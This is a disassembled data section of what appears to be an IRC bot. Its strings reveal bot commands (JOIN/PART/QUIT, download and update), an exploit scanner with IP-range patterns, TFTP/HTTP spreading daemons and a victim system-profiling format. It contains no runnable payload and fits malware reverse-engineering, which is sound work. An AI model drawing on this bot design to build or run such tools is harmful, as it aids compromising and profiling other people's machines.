aListTTooLong	db 'list<T> too long',0 ; DATA XREF: sub_40121E+2Bo
					; sub_4016BA+2Bo
		align 10h
		dd offset dword_421008
off_420B24	dd offset nullsub_28	; DATA XREF: sub_41C22E+23o
dword_420B28	dd 7325h		; DATA XREF: sub_40177B+EBo
					; sub_4019F3+EBo ...
dword_420B2C	dd 652Dh		; DATA XREF: sub_40177B+1D5o
dword_420B30	dd 31h			; DATA XREF: sub_40177B+1E7o
dword_420B34	dd 4C44h		; DATA XREF: sub_40177B+23Fo
					; sub_4019F3+1F1o
aDlAuthFailure_	db 'DL: Auth Failure.',0 ; DATA XREF: sub_40177B:loc_4019C8o
		align 4
aDlInvalidArgum	db 'DL: Invalid Arguments',0 ; DATA XREF: sub_40177B:loc_4019D5o
		align 4
aUpdAuthFailure	db 'UPD: Auth Failure.',0 ; DATA XREF: sub_4019F3:loc_401BF2o
		align 4
aUpdInvalidArgu	db 'UPD: Invalid Arguments.',0 ; DATA XREF: sub_4019F3:loc_401BFFo
		dd offset dword_4211B8
off_420B94	dd offset sub_40177B	; DATA XREF: .text:0041CB35o
					; .data:off_4352A8o
		dd offset dword_42116C
off_420B9C	dd offset sub_4019F3	; DATA XREF: .text:0041CB51o
					; .data:off_4352A4o
dword_420BA0	dd 25207325h, 73h	; DATA XREF: sub_401C1D+8Fo
dword_420BA8	dd 54495551h, 73253A20h, 0A0Dh ; DATA XREF: sub_401C1D+BFo
aQuitIrnPowered	db 'QUIT :Irn Powered',0Dh,0Ah,0 ; DATA XREF: sub_401C1D:loc_401CF7o
aJoinSS		db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401D0C+1Eo
		align 4
aJoinS		db 'JOIN %s',0Dh,0Ah,0  ; DATA XREF: sub_401D0C+30o
		align 4
aIInsufficientA	db 'I: Insufficient Arguments.',0 ; DATA XREF: sub_401D0C:loc_401D4Ao
					; sub_401D67:loc_401D8Ao
		align 10h
aPartS		db 'PART %s',0Dh,0Ah,0  ; DATA XREF: sub_401D67+14o
		align 4
		dd offset dword_42129C
off_420C10	dd offset sub_401C1D	; DATA XREF: .text:0041CB6Do
					; .data:off_4352B4o
		dd offset dword_421250
off_420C18	dd offset sub_401D0C	; DATA XREF: .text:0041CB89o
					; .data:off_4352ACo
		dd offset dword_421204
off_420C20	dd offset sub_401D67	; DATA XREF: .text:0041CBA5o
					; .data:off_4352B0o
aHttpSDS	db 'http://%s:%d/%s',0  ; DATA XREF: sub_401DA7+77o
		dd offset dword_4212E8
off_420C38	dd offset sub_401DA7	; DATA XREF: .text:0041CBC1o
					; .data:off_4352B8o
off_420C3C	dd offset sub_443452+1	; DATA XREF: sub_401E4A+FAo
					; sub_401E4A+142o ...
aS4AlreadyRunni	db 'S4:Already Running',0 ; DATA XREF: sub_401E4A:loc_401F9Ao
		align 4
aS4ThreadStoppe	db 'S4: Thread Stopped',0 ; DATA XREF: sub_401FD7+7Co
		align 4
aS4NoThreadRunn	db 'S4: No Thread Running',0 ; DATA XREF: sub_401FD7:loc_40205Ao
		align 10h
		dd offset dword_421380
off_420C84	dd offset sub_401E4A	; DATA XREF: .text:0041CBDDo
					; .data:off_4352C0o
		dd offset dword_421334
off_420C8C	dd offset sub_401FD7	; DATA XREF: .text:0041CBF9o
					; .data:off_4352BCo
aSystemSCpuIXS@	db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
					; DATA XREF: sub_40207A+185o
		db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
		db 'm]',0
		align 4
aNetIpSHostNA	db 'Net: IP: %s Host: N/A',0 ; DATA XREF: sub_40223C+55o
		align 10h
aNetIpSHostS	db 'Net: IP: %s Host: %s',0 ; DATA XREF: sub_40223C+73o
		align 4
		dd offset dword_421418
off_420D4C	dd offset sub_40207A	; DATA XREF: .text:0041CC15o
					; .data:off_4352C4o
		dd offset dword_4213CC
off_420D54	dd offset sub_40223C	; DATA XREF: .text:0041CC31o
					; .data:off_4352C8o
aScanUnknownExp	db 'Scan: Unknown Exploit.',0 ; DATA XREF: sub_4022D6:loc_4023BBo
		align 10h
a____0		db '*.*.*.*',0          ; DATA XREF: sub_4022D6+107o
aA		db '-a',0               ; DATA XREF: sub_4022D6+146o
		align 4
aB		db '-b',0
		align 10h
aC		db '-c',0               ; DATA XREF: sub_4022D6+164o
		align 4
aScanNotEnoughT	db 'Scan: Not Enough Threads. %d Available.',0 ; DATA XREF: sub_4022D6+1AEo
aD_D_D_D	db '%d.%d.%d.%d',0      ; DATA XREF: sub_4022D6+228o
					; sub_4022D6+365o
aX_		db 'x.',0               ; DATA XREF: sub_4022D6+23Fo
		align 4
aD_		db '%d.',0              ; DATA XREF: sub_4022D6+253o
aSx_		db '%sx.',0             ; DATA XREF: sub_4022D6+26Bo
		align 4
aSD_		db '%s%d.',0            ; DATA XREF: sub_4022D6+266o
		align 10h
aSx		db '%sx',0              ; DATA XREF: sub_4022D6+2C8o
aSD		db '%s%d',0             ; DATA XREF: sub_4022D6+2DDo
		align 4
aD_x_x_x	db '%d.x.x.x',0         ; DATA XREF: sub_4022D6+3BEo
		align 4
aD_D_x_x	db '%d.%d.x.x',0        ; DATA XREF: sub_4022D6+3A7o
		align 4
aD_D_D_x	db '%d.%d.%d.x',0       ; DATA XREF: sub_4022D6+38Do
		align 10h
aScanSDUsingDTh	db 'Scan: %s:%d Using %d Threads.',0 ; DATA XREF: sub_4022D6+408o
		align 10h
aScanner	db 'Scanner',0          ; DATA XREF: sub_4022D6+4E8o
					; sub_4027F4+42o
aScanAllScanThr	db 'Scan: All Scan Threads Stopped. %d killed.',0
					; DATA XREF: sub_4027F4+BFo
		align 4
aStatisticsExpl	db 'Statistics: Exploits:',0 ; DATA XREF: sub_4028D4+3Bo
		align 4
aSSD		db '%s %s: %d',0        ; DATA XREF: sub_4028D4+62o
		align 4
aSDaemons	db '%s; Daemons:',0     ; DATA XREF: sub_4028D4+84o
		align 4
aSTftpD		db '%s TFTP: %d',0      ; DATA XREF: sub_4028D4+9Ao
aSHttpD		db '%s HTTP: %d',0      ; DATA XREF: sub_4028D4+B0o
		dd offset dword_4214FC
off_420EA4	dd offset sub_4022D6	; DATA XREF: .text:0041CC5Bo
					; .data:off_4352D8o
		dd offset dword_4214B0
off_420EAC	dd offset sub_4027F4	; DATA XREF: .text:0041CC77o
					; .data:off_4352D0o
		dd offset dword_421464
off_420EB4	dd offset sub_4028D4	; DATA XREF: .text:0041CC93o
					; .data:off_4352D4o
dbl_420EB8	dq 5.0e-1		; DATA XREF: sub_41AFA7:loc_41B519r
flt_420EC0	dd 4.2949673e9		; DATA XREF: sub_41AFA7+56Cr
		align 8
		dd 48h,	0Eh dup(0)
		dd offset dword_423064
		dd offset dword_421550
		dd 13h
dword_420F10	dd 3 dup(0)		; DATA XREF: _1fieagrn:0041D344o
		dd offset off_423008
		dd offset dword_420F24
dword_420F24	dd 2 dup(0)		; DATA XREF: _1fieagrn:00420F20o
		dd 3, 420F34h, 420F44h,	4210D0h, 42111Ch, 0
		dd offset off_423008
		dd 2, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	420F24h
dword_420F60	dd 3 dup(0)		; DATA XREF: _1fieagrn:0041D378o
		dd offset off_426F30
		dd offset dword_421138
dword_420F74	dd 3 dup(0)		; DATA XREF: _1fieagrn:0041D398o
		dd offset off_423030
		dd offset dword_420F88
dword_420F88	dd 2 dup(0)		; DATA XREF: _1fieagrn:00420F84o
		dd 1, 420F98h, 420FA0h,	0
		dd offset off_423030
		dd 2 dup(0)
		dd 0FFFFFFFFh, 0
		dd 40h,	420F88h
dword_420FBC	dd 3 dup(0)		; DATA XREF: _1fieagrn:0041DC30o
		dd offset off_423E50
		dd offset dword_420FD0
dword_420FD0	dd 2 dup(0)		; DATA XREF: _1fieagrn:00420FCCo
		dd 2, 420FE0h, 420FECh,	42111Ch, 0
		dd offset off_423E50
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	420FD0h
dword_421008	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420B20o
		dd offset off_426ED8
		dd offset dword_42101C
dword_42101C	dd 2 dup(0)		; DATA XREF: _1fieagrn:00421018o
		dd 1, 42102Ch, 421034h,	0
		dd offset off_426ED8
		align 10h
		dd 0FFFFFFFFh, 0
		dd 40h,	42101Ch
dword_421050	dd 3 dup(0)		; DATA XREF: _1fieagrn:0041D338o
		dd offset off_426EF0
		dd offset dword_421064
dword_421064	dd 2 dup(0)		; DATA XREF: _1fieagrn:00421060o
		dd 3, 421074h, 421084h,	4210D0h, 42111Ch, 0
		dd offset off_426EF0
		dd 2, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	421064h
dword_4210A0	dd 3 dup(0)		; DATA XREF: _1fieagrn:0041D32Co
		dd offset off_426F10
		dd offset dword_4210B4
dword_4210B4	dd 2 dup(0)		; DATA XREF: _1fieagrn:004210B0o
		dd 2, 4210C4h, 4210D0h,	42111Ch, 0
		dd offset off_426F10
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4210B4h, 3 dup(0)
		dd offset off_426F4C
		dd offset dword_421100
dword_421100	dd 2 dup(0)		; DATA XREF: _1fieagrn:004210FCo
		dd 2, 421110h, 421150h,	42111Ch, 0
		dd offset off_426F30
		dd 2 dup(0)
		dd 0FFFFFFFFh, 0
		dd 40h,	421138h
dword_421138	dd 2 dup(0)		; DATA XREF: _1fieagrn:00420F70o
		dd 1, 421148h, 42111Ch,	0
		dd offset off_426F4C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	421100h
dword_42116C	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420B98o
		dd offset off_426F68
		dd offset dword_421180
dword_421180	dd 2 dup(0)		; DATA XREF: _1fieagrn:0042117Co
		dd 2, 421190h, 42119Ch,	421034h, 0
		dd offset off_426F68
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	421180h
dword_4211B8	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420B90o
		dd offset off_426F80
		dd offset dword_4211CC
dword_4211CC	dd 2 dup(0)		; DATA XREF: _1fieagrn:004211C8o
		dd 2, 4211DCh, 4211E8h,	421034h, 0
		dd offset off_426F80
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4211CCh
dword_421204	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420C1Co
		dd offset off_426F94
		dd offset dword_421218
dword_421218	dd 2 dup(0)		; DATA XREF: _1fieagrn:00421214o
		dd 2, 421228h, 421234h,	421034h, 0
		dd offset off_426F94
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	421218h
dword_421250	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420C14o
		dd offset off_426FAC
		dd offset dword_421264
dword_421264	dd 2 dup(0)		; DATA XREF: _1fieagrn:00421260o
		dd 2, 421274h, 421280h,	421034h, 0
		dd offset off_426FAC
dword_421284	dd 1, 0			; DATA XREF: eu81y7qg:00489570o
		dd 0FFFFFFFFh, 0
		dd 40h,	421264h
dword_42129C	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420C0Co
		dd offset off_426FC4
		dd offset dword_4212B0
dword_4212B0	dd 2 dup(0)		; DATA XREF: _1fieagrn:004212ACo
		dd 2, 4212C0h, 4212CCh,	421034h, 0
		dd offset off_426FC4
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4212B0h
dword_4212E8	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420C34o
		dd offset off_426FDC
		dd offset dword_4212FC
dword_4212FC	dd 2 dup(0)		; DATA XREF: _1fieagrn:004212F8o
		dd 2, 42130Ch, 421318h,	421034h, 0
		dd offset off_426FDC
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4212FCh
dword_421334	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420C88o
		dd offset off_426FF8
		dd offset dword_421348
dword_421348	dd 2 dup(0)		; DATA XREF: _1fieagrn:00421344o
		dd 2, 421358h, 421364h,	421034h, 0
		dd offset off_426FF8
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	421348h
dword_421380	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420C80o
		dd offset off_427010
		dd offset dword_421394
dword_421394	dd 2 dup(0)		; DATA XREF: _1fieagrn:00421390o
		dd 2, 4213A4h, 4213B0h,	421034h, 0
		dd offset off_427010
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	421394h
dword_4213CC	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420D50o
		dd offset off_427024
		dd offset dword_4213E0
dword_4213E0	dd 2 dup(0)		; DATA XREF: _1fieagrn:004213DCo
		dd 2, 4213F0h, 4213FCh,	421034h, 0
		dd offset off_427024
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4213E0h
dword_421418	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420D48o
		dd offset off_427040
		dd offset dword_42142C
dword_42142C	dd 2 dup(0)		; DATA XREF: _1fieagrn:00421428o
		dd 2, 42143Ch, 421448h,	421034h, 0
		dd offset off_427040
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	42142Ch
dword_421464	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420EB0o
		dd offset off_42705C
		dd offset dword_421478
dword_421478	dd 2 dup(0)		; DATA XREF: _1fieagrn:00421474o
		dd 2, 421488h, 421494h,	421034h, 0
		dd offset off_42705C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	421478h
dword_4214B0	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420EA8o
		dd offset off_427078
		dd offset dword_4214C4
dword_4214C4	dd 2 dup(0)		; DATA XREF: _1fieagrn:004214C0o
		dd 2, 4214D4h, 4214E0h,	421034h, 0
		dd offset off_427078
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4214C4h
dword_4214FC	dd 3 dup(0)		; DATA XREF: _1fieagrn:00420EA0o
		dd offset off_427094
		dd offset dword_421510
dword_421510	dd 2 dup(0)		; DATA XREF: _1fieagrn:0042150Co
		dd 2, 421520h, 42152Ch,	421034h, 0
		dd offset off_427094
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	421510h, 2 dup(0)
dword_421550	dd 4674h, 4779h, 69F0h,	8A08h, 0EF18h, 1C8A3h, 1C8BEh
					; DATA XREF: _1fieagrn:00420F08o
		dd 1C8D9h, 1C8FCh, 1C91Fh, 1C944h, 1C969h, 1C991h, 1C9CCh
		dd 1C9FCh, 1CA21h, 1CA53h, 1CA8Eh, 1CAC3h, 0
dword_4215A0	dd 2 dup(0)		; DATA XREF: sub_40B3F1+2o
					; sub_40B3F1+7o
dword_4215A8	dd 2 dup(0)		; DATA XREF: sub_40B415+2o
					; sub_40B415+7o
dword_4215B0	dd 0			; DATA XREF: sub_402A79+29o
		dd offset sub_402A0D
		dd 0
		dd offset dword_4215EC
		dd 0FFFFFFFFh, 41C89Bh
dword_4215C8	dd 19930522h, 1, 4215C0h, 5 dup(0) ; DATA XREF:	.text:0041C8B4o
		dd 1
dword_4215EC	dd 3, 4215FCh, 421C50h,	421C6Ch, 0 ; DATA XREF:	_1fieagrn:004215BCo
		dd offset off_423008
		align 8
		dd 0FFFFFFFFh, 0
		dd 28h,	402AB8h
dword_421618	dd 0FFFFFFFEh, 0	; DATA XREF: sub_402E05+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_402E97
		align 8
dword_421638	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4031A5+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4031DB
		align 8
dword_421658	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4034F0+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4035AA
		align 8
dword_421678	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4035C7+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40370C
		align 8
dword_421698	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403884+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4038F5
		align 8
dword_4216B8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4039C3+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403A19
		align 8
dword_4216D8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403A51+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403A97
		align 8
dword_4216F8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_404078+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_404135
		align 8
dword_421718	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4044D2-1DEo
		dd 0FFFFFF80h, 0
		dd 0FFFFFFFEh, 4044B9h,	4044BDh, 0FFFFFFFEh, 40447Fh, 404493h
dword_421740	dd 0FFFFFFFEh, 0	; DATA XREF: sub_404D50+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_404DE8
		align 10h
dword_421760	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405019+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40517A
		align 10h
dword_421780	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405461+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
; ---------------------------------------------------------------------------
		retf
; ---------------------------------------------------------------------------
		db 54h,	40h, 0
		align 10h
dword_4217A0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405616+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4056C1
		align 10h
dword_4217C0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405765+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40586E
		dd 0FFFFFFFEh, 0
		dd offset sub_40587A
dword_4217E8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405CE4+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_405D9E
		align 8
dword_421808	dd 0FFFFFFFEh, 0	; DATA XREF: sub_407DBB+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset loc_407E71
		align 8
dword_421828	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408305+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40836C
		align 8
dword_421848	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408851+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40896B
		align 8
dword_421868	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408B90+2o
		dd 0FFFFFF8Ch, 0
		dd 0FFFFFFFEh, 408DB9h,	408DBDh, 0
dword_421888	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408E91+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_408F54
		align 8
dword_4218A8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40902E+2o
		db 0CCh
		db 3 dup(0FFh)
		align 8
		dd 0FFFFFFFEh, 0
		dd offset sub_4090FF
		dd 2 dup(0)
; ---------------------------------------------------------------------------
		retf
; ---------------------------------------------------------------------------
		align 2
		dw 40h
dword_4218D0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40A6FF+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40A7D1
		align 10h
dword_4218F0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40B64B+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40B70B
		align 10h
		dd offset loc_40B6CD
		dd offset loc_40B6D7
dword_421918	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40B771+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40B7B4h,	40B7BDh, 40h, 2	dup(0)
		dd offset sub_40B894
		dd 0FFFFFFFFh, 0
		dd 0FFFFFFFFh, 3 dup(0)
		dd 2 dup(1), 421934h
dword_421968	dd 19930522h, 2, 421944h, 1, 421954h, 3	dup(0) ; DATA XREF: .text:0041C8CFo
		dd 1, 0
dword_421990	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40B8AC+2o
		dd 0FFFFFFB4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40B9CC
		align 10h
		dd offset loc_40B93C
		dd offset loc_40B945
dword_4219B8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40BA48+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 40BBB3h,	40BBB7h, 0
dword_4219D8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40BBC7+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40BC4Ch,	40BC50h
dword_4219F4	dd 0			; DATA XREF: sub_40BDB6+162o
		dd offset sub_40B57E
		align 10h
		dd offset dword_421A04
dword_421A04	dd 2, 421A10h, 421C6Ch,	0 ; DATA XREF: _1fieagrn:00421A00o
		dd offset off_423E50
		dd 0
		dd 0FFFFFFFFh, 0
		dd 0Ch,	40C10Ch, 0
dword_421A30	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40C208+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40C228h,	40C22Ch, 0
dword_421A50	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40C254+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40C278h,	40C27Ch, 0
dword_421A70	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40CEC4+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 40CF4Ah,	40CF61h, 0
dword_421A90	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D002+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40D048h,	40D05Ch, 0
dword_421AB0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D0F1+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40D200
		align 10h
dword_421AD0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D7D0+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40D8A2
		align 10h
dword_421AF0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40DCFF+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40DDF6
		align 10h
dword_421B10	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40DE1D+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40DF5B
		align 10h
dword_421B30	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40E0D9+2o
		dd 0FFFFFFC0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E247
		align 10h
dword_421B50	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40E383+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E419
		align 10h
dword_421B70	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40EA60+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40EAF9
		align 10h
dword_421B90	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F19E+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F230
		align 10h
dword_421BB0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F260+2o
		dd 0FFFFFFC8h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F3F6
		dd 2 dup(0)
		dd offset sub_40F32D
dword_421BD8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F3FF+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F4D6
		align 8
dword_421BF8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40FB3A+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 40FB57h,	40FB73h, 0
dword_421C18	dd 0FFFFFFFEh, 0	; DATA XREF: sub_41048B+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 4104B8h,	4104D4h, 0
		dd offset off_426EF0
		align 10h
		dd 0FFFFFFFFh, 0
		dd 28h,	4013CEh, 0
		dd offset off_426F10
		dd 0
		dd 0FFFFFFFFh, 0
		dd 28h,	4013E6h, 0
		dd offset off_426F30
		align 8
		dd 0FFFFFFFFh, 0
dword_421C80	dd 0Ch,	403032h, 3, 421C34h, 421C50h, 421C6Ch
					; DATA XREF: _1fieagrn:00421CA4o
dword_421C98	dd 0			; DATA XREF: sub_40121E+48o
					; sub_4016BA+48o ...
		dd offset loc_4010E1
		dd 0
		dd offset dword_421C80+8
		dd 0
		dd offset off_426F4C
		dd 0
		dd 0FFFFFFFFh, 0
dword_421CBC	dd 0Ch,	401637h, 2, 421CA8h, 421C6Ch ; DATA XREF: _1fieagrn:00421CDCo
dword_421CD0	dd 0			; DATA XREF: sub_4015ED+34o
					; sub_40340B+54o
		dd offset sub_401038
		dd 0
		dd offset dword_421CBC+8
dword_421CE0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_419F50+2o
		dd 0FFFFFFB4h, 0
		dd 0FFFFFFFEh, 5 dup(0)
		dd 0FFFFFFFFh, 41C93Ah
dword_421D10	dd 19930522h, 1, 421D08h, 5 dup(0) ; DATA XREF:	.text:0041C955o
		dd 1, 0FFFFFFFFh, 41C95Fh
dword_421D3C	dd 19930522h, 1, 421D34h, 5 dup(0) ; DATA XREF:	.text:0041C97Ao
		dd 1, 0FFFFFFFFh, 41C984h
dword_421D68	dd 19930522h, 1, 421D60h, 5 dup(0) ; DATA XREF:	.text:0041C9B5o
		dd 1, 0FFFFFFFFh, 41C9BFh
dword_421D94	dd 19930522h, 1, 421D8Ch, 5 dup(0) ; DATA XREF:	.text:0041C9EAo
		dd 1, 0FFFFFFFFh, 0
		dd 0FFFFFFFFh, 0
		dd 1, 0
		dd 1, 0
		dd 40h,	2 dup(0)
		dd offset sub_40150F
		dd 40h,	2 dup(0)
		dd offset byte_40149D
		dd 2 dup(2), 3,	1, 421DD8h, 2 dup(0)
		dd 3, 1, 421DE8h
dword_421E20	dd 19930522h, 4, 421DB8h, 2, 421DF8h, 3	dup(0) ; DATA XREF: sub_41C8D9+11o
		dd 1, 0
		dd 0FFFFFFFFh, 41C8F4h
dword_421E50	dd 19930522h, 1, 421E48h, 5 dup(0) ; DATA XREF:	.text:0041C90Do
		dd 1, 0
		dd 0FFFFFFFFh, 41C917h
dword_421E80	dd 19930522h, 1, 421E78h, 5 dup(0) ; DATA XREF:	.text:0041C930o
		dd 1, 0
		dd 0FFFFFFFFh, 41C9F4h
dword_421EB0	dd 19930522h, 1, 421EA8h, 5 dup(0) ; DATA XREF:	.text:0041CA0Do
		dd 1, 0
		dd 0FFFFFFFFh, 41CA17h
dword_421EE0	dd 19930522h, 1, 421ED8h, 5 dup(0) ; DATA XREF:	.text:0041CA3Co
		dd 1, 0
		dd 0FFFFFFFFh, 41CA46h
dword_421F10	dd 19930522h, 1, 421F08h, 5 dup(0) ; DATA XREF:	.text:0041CA77o
		dd 1, 0
		dd 0FFFFFFFFh, 41CA81h
dword_421F40	dd 19930522h, 1, 421F38h, 5 dup(0) ; DATA XREF:	.text:0041CAACo
		dd 1, 0
		dd 0FFFFFFFFh, 41CAB6h
dword_421F70	dd 19930522h, 1, 421F68h, 5 dup(0) ; DATA XREF:	.text:0041CAE1o
		dd 1, 41Bh dup(0)
_1fieagrn	ends

; Section 3. (virtual address 00023000)
; Virtual size			: 00014000 (  81920.)
; Section size in file		: 00014000 (  81920.)
; Offset to raw	data for section: 00023000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 423000h
		dd offset dword_41D310
		dd offset dword_41D310
off_423008	dd offset off_41D39C	; DATA XREF: _1fieagrn:00420F1Co
					; _1fieagrn:00420F44o ...
		align 10h
a_?avout_of_ran	db '.?AVout_of_range@std@@',0
		align 4
		dd offset dword_41D310
		dd offset dword_41D310
off_423030	dd offset off_41D39C	; DATA XREF: _1fieagrn:00420F80o
					; _1fieagrn:00420FA0o
		align 8
a_?avtype_info@	db '.?AVtype_info@@',0
off_423048	dd offset dword_41D310	; DATA XREF: sub_4033F2+3o
		align 10h
dword_423050	dd 2			; DATA XREF: sub_409E64+42r
					; sub_40A004+19r ...
		align 10h
		dd offset sub_40B4CD
dword_423064	dd 2FB3518Ah		; DATA XREF: sub_401DA7+9r
					; sub_401E4A+1Ar ...
dword_423068	dd 0D04CAE75h		; DATA XREF: sub_404A3E+AEr
					; sub_40B439+29w ...
		align 10h
dword_423070	dd 0FFFFFFFFh, 16h dup(0) ; DATA XREF: sub_404B71+29o
					; sub_404D50+63o ...
		dd 10100000h, 6	dup(10101010h),	0
		dd 20200000h, 6	dup(20202020h),	31h dup(0)
		dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
		dd 76757473h, 7A797877h, 0
		db    0
		align 2
